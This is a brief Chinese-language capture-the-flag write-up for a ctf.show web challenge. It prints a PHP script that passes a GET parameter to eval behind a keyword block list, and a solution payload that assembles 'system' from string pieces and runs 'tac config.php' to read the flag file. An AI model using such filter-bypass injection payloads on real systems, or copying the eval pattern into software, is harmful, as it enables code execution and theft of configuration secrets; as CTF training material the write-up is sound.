技術標籤：CTF.showCTF_Web_Writeup

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
 

}else{
        highlight_file(__FILE__);
}
?>

比上一題多禁用了一個cat,把cat換成tac就行了

?c=$a='sys';$b='tem';$d=$a.$b;$d('tac config.php');